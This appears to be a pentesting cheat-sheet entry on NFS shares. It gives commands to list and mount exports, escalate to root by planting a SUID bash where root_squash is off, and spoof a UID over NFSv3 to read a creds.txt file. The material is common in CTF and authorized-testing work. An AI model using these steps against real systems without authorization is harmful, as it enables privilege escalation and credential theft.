TCP 2049: NFS
Network File System is a distributed file system protocol originally developed by Sun Microsystems in 1984, allowing a user on a client computer to access files over a computer network much like local storage is accessed.
-- Wikipedia
Basics
Show mounts
sudo showmount -e <ip>
Mount
sudo mkdir /mnt/<share>
sudo mount <ip>:/<share> /mnt/<share>
Privilege escalation via root_squash
When enabled (default), connected users are assigned "nfsnobody" (least local privileges). However, when turned off, one can upload a SUID binary and execute it.
e.g. using bash
# get a compatible bash binary for the target system
sudo chown root bash
sudo chmod +sx bash
On target
./bash -p
Exploitation
If permissions are "65534 / nobody", "4294967294 / UNKNOWN"
-rwx------ 1 nobody 4294967294 48 Oct 28 2019 creds.txt
Try to use nfs version 3
mount -t nfs -o vers=3 <ip>:/<share> <share>
-rwx------ 1 1014 1014 48 Oct 28 2019 creds.txt
Now all that's left is to create a user with that id, to access the file
groupadd --gid 1014 nfsgroup
useradd --uid 1014 --groups nfsgroup nfsuser
sudo -u nfsuser ls -l
Source: Write-up Vulnix - playing around with NFS - Christophe Tafani-Dereeper
Last updated